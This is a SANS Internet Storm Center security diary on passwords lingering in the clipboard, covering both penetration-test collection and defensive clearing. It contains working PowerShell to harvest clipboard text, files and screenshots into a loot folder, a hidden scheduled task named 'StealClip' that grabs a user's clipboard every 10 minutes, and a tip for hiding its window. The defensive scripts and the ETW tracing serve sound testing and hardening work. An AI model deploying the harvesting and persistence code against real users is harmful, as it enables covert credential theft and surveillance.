Archive for September 11th, 2020
Recently I happened to notice that the Cisco AnyConnect VPN client clears the clipboard if you paste a password into it. (Note – if you know and can type any of your passwords in 2020, you should at least partially examine your life choices). Several password managers also do this “right thing” – retaining passwords in the clipboard is a great way for folks to accidentally paste that information into the worst possible place after login (like say into something that’ll post that info into clear text log files), or in the worst case allows it to get stolen post-login.
This got me to thinking: why doesn't PuTTY do this after password entry, or the Windows RDP client for that matter? Or the myriad of traditional and web apps that take userid/password input for access?
From an attacker's point of view, the clipboard really is simple to collect in PowerShell:
$clp = Get-Clipboard -Format Text   # Windows PowerShell 5.1; PowerShell 7 dropped -Format, so there it is just Get-Clipboard
This can be a valuable piece of information to collect in a penetration test, if you happen to have code execution in the user's context. If you catch the right person, you are likely to collect the password for some other system: a router, switch or firewall, a hypervisor, or even a mainframe. Even better, credentials for "standalone" business systems such as accounting or shop-floor control systems are pure gold. Pivoting from your existing access to other systems and privilege levels is the whole point of any internal security assessment / penetration test.
You can of course also collect any graphics or files that are in the clipboard, which can sometimes be just as useful.
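To show what "collect the clipboard" looks like beyond the one-liner, here is an added example (not code from the original diary) that pulls all three clipboard formats Windows PowerShell 5.1 exposes, handles the empty-clipboard case, and writes text and images to a drop folder. The function name and the drop folder under `$env:TEMP` are this example's own choices, and it must run inside the target user's interactive session for the reasons discussed below.

```powershell
# Added example: harvest text, file lists and images from the current session's clipboard.
# Requires Windows PowerShell 5.1 (PowerShell 7 removed Get-Clipboard -Format).
Add-Type -AssemblyName System.Drawing   # for saving an Image object as PNG

function Get-ClipboardLoot {
    param(
        [string]$OutDir = "$env:TEMP\cliploot"   # assumed drop location
    )
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $stamp = Get-Date -Format 'yyyyMMdd-HHmmss'
    $loot  = [ordered]@{
        Time  = $stamp
        User  = "$env:USERDOMAIN\$env:USERNAME"
        Text  = $null
        Files = @()
        Image = $null
    }

    # Text: the usual case for a pasted password. -Raw keeps multi-line content intact.
    $text = Get-Clipboard -Format Text -Raw
    if (-not [string]::IsNullOrEmpty($text)) {
        $loot.Text = $text
        $text | Out-File -FilePath (Join-Path $OutDir "$stamp.txt") -Encoding utf8
    }

    # Files copied in Explorer arrive as a FileDropList of FileInfo objects.
    $files = Get-Clipboard -Format FileDropList
    if ($files) {
        $loot.Files = @($files | ForEach-Object { $_.FullName })
    }

    # Screenshots (PrtScn, Snipping Tool) arrive as a System.Drawing.Image.
    $img = Get-Clipboard -Format Image
    if ($img) {
        $path = Join-Path $OutDir "$stamp.png"
        $img.Save($path, [System.Drawing.Imaging.ImageFormat]::Png)
        $loot.Image = $path
    }

    # Returns one record per call; an empty clipboard gives nulls/empty lists, not an error.
    [pscustomobject]$loot
}

Get-ClipboardLoot
```

Each call returns a single object, so the function drops straight into a loop or a scheduled task and the output can be filtered on `Text`, `Files` or `Image` before anything is exfiltrated.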
If you don't have code execution, you can ask the Chrome or Opera browser to give up your target's clipboard by tricking the target into browsing to a specific website; "ClipboardMe" is a decent tool to do this. The main downside is that this tool involves a third-party site to collect the information. For some extra fun, this tool can also be used to modify your victim's clipboard. The tool also records the IP addresses of your victim(s); just keep in mind that if those folks are all in the same organization (and on premise), they'll likely all have the same public IP address. In the screenshot below you see me testing this tool using 3 different browser versions:
While you can technically also collect a remote station's clipboard using any of the various remote admin tools, in most cases this opens a new session. Clipboards are per session (strictly, per window station), so these methods will either return nothing or return the clipboard of the station doing the remoting; in most cases this is a dead end. What does work is a scheduled task on the target's machine that runs as the target user, inside that user's interactive session. The short PowerShell script below registers a task that grabs their clipboard every 10 minutes (or whatever interval you specify). It does "flash" on the screen when it runs, though: -WindowStyle Hidden only hides the console window after conhost has already created it. Running the task "whether the user is logged on or not" avoids the flash, but that puts it in another session, so it doesn't work. One well-known workaround for the flash is to have the task launch wscript.exe with a two-line VBScript that starts PowerShell via WScript.Shell's Run method with window style 0, since wscript.exe creates no console window of its own. (If anyone has a decent workaround for this, please drop it in our comment section?)
# Output path as in the original; the c:\xfer folder must already exist.
$out = 'c:\xfer\example.txt'
$argument = "-WindowStyle Hidden -NonInteractive -Command `"whoami | Out-File -Append $out ; Get-Clipboard | Out-File -Append $out`""
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument $argument
# Run as the current user in the interactive session: that is the session whose clipboard we want.
$u = whoami ; $principal = New-ScheduledTaskPrincipal -UserId $u -LogonType Interactive
# Fire every 10 minutes for one day, starting at 7am.
$trigger = New-ScheduledTaskTrigger -Once -At 7am -RepetitionDuration (New-TimeSpan -Days 1) -RepetitionInterval (New-TimeSpan -Minutes 10)
# Hidden task that keeps running on battery; these settings are passed to the task below.
$settings = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$task = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings
Register-ScheduledTask "StealClip" -InputObject $task -Force
The other caveat of course is that to do this you have to have that user (and likely the domain) compromised. Remember that this method is all about pivoting to that next (non AD) platform.
From a defensive point of view, the clipboard is also pretty easy to clear, both in PowerShell and otherwise:
From the basic (cmd.exe) command line you can use the "clip" command to clear the clipboard; any of these commands will work:
break | clip
type nul | clip
echo. > nul | clip
(echoing anything to nul will work: clip simply copies its empty standard input to the clipboard)
From Powershell it’s not even convoluted, it’s documented:
First, you can still use nul and the clipboard:
echo $null | clip.exe
Yes, this works in PowerShell on Linux as well, as long as xclip is in the path. Note that xclip's default target is the PRIMARY selection, not the CLIPBOARD selection that Ctrl-V (and PowerShell's own clipboard cmdlets) use, so tell it which one to clear:
echo $null | xclip -selection clipboard
In Windows you can use .NET; you'll see a noticeable pause the first time this runs while the assembly loads:
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.Clipboard]::Clear()
Or, you can just use the native PowerShell cmdlet, by far the preferred approach these days:
Set-Clipboard -Value $null
This last one also works in PowerShell on Linux; again, you need xclip in your path (normally it is).
As expected, this one is documented at https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-clipboard?view=powershell-7
So if it’s that easy to clear, why don’t common apps that accept passwords just do this?
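Here is what "do the right thing after password entry" can look like in practice, as an added example that is not part of the original diary and not any vendor's code. Rather than blindly wiping the clipboard, it clears it only if the clipboard still holds the exact secret that was just consumed, so a user who pasted a password and then copied something else is not punished. The function name, parameter and the `Get-Credential` prompt are this example's own; it targets Windows PowerShell 5.1 or PowerShell 7 on Windows.

```powershell
# Added example: clear the clipboard only when it still contains the password just used.
function Clear-ClipboardIfSecret {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][securestring]$Secret
    )

    $clip = Get-Clipboard -Raw
    if ([string]::IsNullOrEmpty($clip)) { return $false }   # nothing on the clipboard, nothing to do

    # Decrypt the SecureString only long enough to compare, then zero the unmanaged buffer.
    # (The managed string copy cannot be zeroed; the paste itself already created that exposure.)
    $bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($Secret)
    try {
        $plain = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
        # Password managers sometimes copy a trailing newline; ignore it, compare case-sensitively.
        $match = [string]::Equals($clip.TrimEnd([char[]]"`r`n"), $plain, [StringComparison]::Ordinal)
    } finally {
        [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
        $plain = $null
    }

    if (-not $match) { return $false }   # clipboard holds something else; leave it alone

    Set-Clipboard -Value $null           # documented way to empty the clipboard
    return $true
}

# Usage: prompt (the user will typically paste from a password manager), use the
# credential, then clean up. Replace the comment with the real login step.
$cred = Get-Credential -Message 'Paste the password for the target device'
# ... authenticate with $cred here (SSH, REST call, etc.) ...
if (Clear-ClipboardIfSecret -Secret $cred.Password) {
    'Clipboard held the password just used; cleared it.'
} else {
    'Clipboard did not contain the password; left untouched.'
}
```

The comparison is ordinal and case-sensitive on purpose: a near-miss is not the secret, and clearing on a loose match would surprise users. Returning a boolean rather than printing makes the check usable from a login wrapper or a test.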
While it's not well documented, Matt Graeber (Mattifestation) outlines various ETW (Event Tracing for Windows) providers for the clipboard here: https://gist.github.com/mattifestation/04e8299d8bc97ef825affe733310f7bd
Notably, a vendor could monitor this one during password input and clear the clipboard if a paste is detected (in other words, clear the clipboard if a password is pasted in, just after it's used). An application that owns the password field can also see the paste arrive in its own control without ETW, and password managers such as KeePass additionally wipe the clipboard a fixed number of seconds after you copy a password. I'm assuming that this is how most password managers get the job done:
ETW Provider name: Microsoft.Windows.OLE.Clipboard
Provider guid: 3e0e3a92-b00b-4456-9dee-f40aba77f00e
Unfortunately, there isn’t much documentation for this provider past Matt’s “look what I found” listing. So do I have code for this? Nope, sorry I do not. However, if you’ve got any code that uses this provider, please post a link in our comment form, the more we “pile on” to this concept, the fewer excuses our various vendors have not to be responsibly clearing passwords out of clipboards (after they are used of course).
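Short of application code, the practical first check is whether the provider listed above emits anything at all when the clipboard changes. The following is an added example (not from the diary or from the gist) that records a trace for just that GUID with the built-in logman and tracerpt tools while the clipboard is set and read, then counts the events and prints the first few. The session name and file paths are arbitrary choices, an elevated Windows PowerShell prompt is needed, and because the event schema is undocumented the script only reports what it sees rather than assuming field names.

```powershell
# Added example: does Microsoft.Windows.OLE.Clipboard emit events on clipboard activity?
$provider = '{3e0e3a92-b00b-4456-9dee-f40aba77f00e}'   # GUID as listed in the gist
$session  = 'ClipTrace'                                  # arbitrary session name
$etl      = "$env:TEMP\cliptrace.etl"
$xml      = "$env:TEMP\cliptrace.xml"

# Is the provider registered on this build at all? (prints keywords/levels if so)
logman query providers $provider

# Start a trace session for this one provider, all keywords (0xff..ff), all levels (0xff).
logman create trace $session -p $provider 0xffffffffffffffff 0xff -o $etl -ets
if ($LASTEXITCODE -ne 0) { throw "logman could not start the session (run elevated?)" }

# Generate clipboard activity while the trace runs; values are dummies.
Set-Clipboard -Value 'not-a-real-password'
Start-Sleep -Seconds 1
$null = Get-Clipboard
Set-Clipboard -Value 'something else'
Start-Sleep -Seconds 1

logman stop $session -ets

# Convert the binary trace to XML and look at what came out.
tracerpt $etl -o $xml -of XML -y
[xml]$trace = Get-Content -Raw $xml
$events = @($trace.Events.Event | Where-Object { $_ })
'{0} event(s) recorded from {1}' -f $events.Count, $provider

foreach ($e in ($events | Select-Object -First 5)) {
    # EventID is a bare element or one with attributes depending on the provider; handle both.
    $id = $e.System.EventID
    if ($id -is [System.Xml.XmlElement]) { $id = $id.InnerText }
    '{0}  id={1}  {2}' -f $e.System.TimeCreated.SystemTime, $id, $e.System.Provider.Name
}
```

If the count stays at zero, the provider is not firing for these operations on that build and the ETW route is a dead end there; if events appear, the XML file is the place to work out which event ID corresponds to a paste before building anything on it.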
So stay tuned, if someone posts an ETW method to our comments everyone wins. If not, I’ll keep poking at this, you might see a related story in the next couple of weeks.
In the meantime, if you’ve noticed any other apps that clear the clipboard (or don’t clear the clipboard) at the right time, please also let us know in our comment form – this would be a good “list of things to fix”
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.